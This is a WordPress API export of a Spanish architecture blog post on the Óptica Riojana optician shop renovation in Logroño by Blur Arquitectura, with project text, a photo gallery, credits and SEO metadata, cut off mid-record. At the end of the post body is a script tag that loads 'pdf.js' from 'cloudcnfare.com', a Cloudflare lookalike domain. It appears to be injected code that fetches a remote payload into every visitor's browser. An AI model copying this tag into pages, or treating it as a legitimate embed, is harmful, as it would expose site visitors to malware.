{"id":69770,"date":"2018-07-10T00:01:34","date_gmt":"2018-07-09T22:01:34","guid":{"rendered":"https:\/\/veredes.es\/blog\/?p=69770"},"modified":"2018-07-11T00:30:50","modified_gmt":"2018-07-10T22:30:50","slug":"optica-riojana-blur-arquitectura","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/","title":{"rendered":"\u00d3ptica Riojana | Blur Arquitectura"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: justify;\">Encontramos un espacio fragmentado sin un orden aparente. Un espacio que se ha ido adecuando a las necesidades propias del negocio a lo largo del tiempo.<\/p>\n<p style=\"text-align: justify;\">Empezamos el proyecto ordenando el programa en dos espacios claramente diferenciados.<\/p>\n<p style=\"text-align: justify;\">Un primer espacio expositivo con un car\u00e1cter m\u00e1s p\u00fablico y vinculado directamente con la calle.<\/p>\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-69772\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-754x1024.jpg\" alt=\"\u00d3ptica Riojana Blur Arquitectura o1\" width=\"640\" height=\"869\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-754x1024.jpg 754w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-221x300.jpg 221w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1.jpg 1200w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p style=\"text-align: justify;\">Espacio entendido como una peque\u00f1a plaza anexa a la v\u00eda p\u00fablica. Plaza que se articula, se organiza partiendo de un volumen central, como si de un kiosco se tratara. Un volumen que genera a su vez otros espacios con sus lindes seg\u00fan su ubicaci\u00f3n. Espacios, \u00e1reas con diferentes cualidades que responden al programa requerido.<\/p>\n<p style=\"text-align: justify;\">En este volumen, caja, ubicamos el coraz\u00f3n del programa donde se genera y manipula el producto luego expuesto, el taller. Un taller que se expone al p\u00fablico para ver y ser visto a trav\u00e9s de un gran ventanal.<\/p>\n<p style=\"text-align: justify;\">Un segundo espacio con car\u00e1cter m\u00e1s privado organizar\u00e1 de una forma m\u00e1s convencional el resto del programa: consultas, ba\u00f1o, almac\u00e9n, sala de espera, escalera\u2026<\/p>\n<p style=\"text-align: justify;\">Siguiendo con la sencillez del planteamiento inicial as\u00ed tambi\u00e9n lo aplicamos a los materiales. Se reducen al m\u00ednimo para enfatizar y dar valor al producto expuesto. Madera de roble natural en la caja-taller y sillas, aglomerado tipo DM lacado blanco para el mobiliario (mesas de atenci\u00f3n al cliente y mostrador), celos\u00eda blanca vertical retroiluminada para la exposici\u00f3n del producto y para finalizar un lin\u00f3leum blanco roto en todo el pavimento acabar\u00e1 de unificar todos los espacios.<\/p>\n<div id='gallery-1' class='gallery galleryid-69770 gallery-columns-4 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o1-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o3.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o3-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o3-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o3-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o4.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o4-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o4-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o4-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o5.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o5-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o5-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o5-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o6.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o6-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o6-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o6-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o7.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o7-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o7-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o7-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o8.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o8-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o8-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o8-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o9-Estado-actual.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o9-Estado-actual-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o9-Estado-actual-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o9-Estado-actual-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o10-Planta-reformada.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o10-Planta-reformada-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o10-Planta-reformada-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o10-Planta-reformada-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o11-Variaciones-de-planta-en-funci\u00f3n-uso.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o11-Variaciones-de-planta-en-funci\u00f3n-uso-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o11-Variaciones-de-planta-en-funci\u00f3n-uso-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o11-Variaciones-de-planta-en-funci\u00f3n-uso-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o12-Cubo-madera.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o12-Cubo-madera-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o12-Cubo-madera-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o12-Cubo-madera-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o13-Isometrica.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o13-Isometrica-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o13-Isometrica-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o13-Isometrica-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o14-Secciones.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o14-Secciones-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o14-Secciones-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o14-Secciones-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o15-Alzados.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"120\" height=\"120\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o15-Alzados-120x120.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o15-Alzados-120x120.jpg 120w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/Planta-\u00d3ptica-Riojana-Blur-Arquitectura-o15-Alzados-150x150.jpg 150w\" sizes=\"auto, (max-width: 120px) 100vw, 120px\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p>Obra: \u00d3ptica Riojana<br \/>\nAutor: Blur Arquitectura<br \/>\nUbicaci\u00f3n: Logro\u00f1o, Espa\u00f1a<br \/>\nSuperficie total: 319,11 m2<br \/>\nSuperficie \u00fatil total: 272,58 m2<br \/>\nA\u00f1o construcci\u00f3n: 2017<br \/>\nConstructor: Construcciones Bauza SL<br \/>\nTabiques y Techos: DeCorta Decoraci\u00f3n SL<br \/>\nInst. El\u00e9ctrica: Chema SL<br \/>\nInst. Climatizaci\u00f3n: Comercial Romero SA<br \/>\nIluminaci\u00f3n: Osaba Iluminaci\u00f3n<br \/>\nDise\u00f1o gr\u00e1fico: Sidecar<br \/>\nFotograf\u00edas: <a href=\"http:\/\/antoniovphoto.com\" target=\"_blank\">Antonio V\u00e1zquez <\/a><br \/>\n<a href=\"http:\/\/www.blurarquitectura.com\" target=\"_blank\"><span style=\"color: #999999;\">+ blurarquitectura.com <\/span><\/a><\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Encontramos un espacio fragmentado sin un orden aparente. Un espacio que se ha ido adecuando a las necesidades propias del negocio a lo largo del tiempo. Empezamos el proyecto ordenando el programa en dos espacios claramente diferenciados. Un primer espacio expositivo con un car\u00e1cter m\u00e1s p\u00fablico y vinculado directamente con la calle. Espacio entendido como [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":69773,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,50,23,2039,5951],"tags":[8273,2631,13719,13720,432,8274,513,1843,13722,1155,12472,13721],"class_list":{"0":"post-69770","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-arquitectura","8":"category-equipamiento-sanitario","9":"category-obras","10":"category-reforma-interior","11":"category-slider-principal","13":"tag-arquitectura-espanola","14":"tag-arquitectura-riojana","15":"tag-blur-arquitectura","16":"tag-diseno-interiores","17":"tag-enric-farrerons","18":"tag-espacio-interior","19":"tag-local-comercial","20":"tag-maria-de-castro","21":"tag-reforma","22":"tag-reforma-interior","23":"tag-xiomara-laso"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u00d3ptica Riojana | Blur Arquitectura - veredes<\/title>\n<meta name=\"description\" content=\"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:] - veredes\" \/>\n<meta property=\"og:description\" content=\"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-09T22:01:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-10T22:30:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"882\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"veredes\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/veredes\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"veredes\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/\"},\"author\":{\"name\":\"veredes\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/0bbb669073ef7faba5168a0844e93d2c\"},\"headline\":\"\u00d3ptica Riojana | Blur Arquitectura\",\"datePublished\":\"2018-07-09T22:01:34+00:00\",\"dateModified\":\"2018-07-10T22:30:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/\"},\"wordCount\":974,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg\",\"keywords\":[\"Alex Borr\u00e1s\",\"arquitectura espa\u00f1ola\",\"arquitectura riojana\",\"Blur Arquitectura\",\"dise\u00f1o interiores\",\"enric farrerons\",\"espacio interior\",\"local comercial\",\"Maria de Castro\",\"reforma\",\"reforma interior\",\"Xiomara Laso\"],\"articleSection\":[\"arquitectura\",\"equipamiento sanitario\",\"obras\",\"reforma interior\",\"slider principal\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/\",\"name\":\"[:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:] - veredes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg\",\"datePublished\":\"2018-07-09T22:01:34+00:00\",\"dateModified\":\"2018-07-10T22:30:50+00:00\",\"description\":\"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/07\\\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg\",\"width\":1200,\"height\":882},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/optica-riojana-blur-arquitectura\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00d3ptica Riojana | Blur Arquitectura\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/0bbb669073ef7faba5168a0844e93d2c\",\"name\":\"veredes\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/face-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/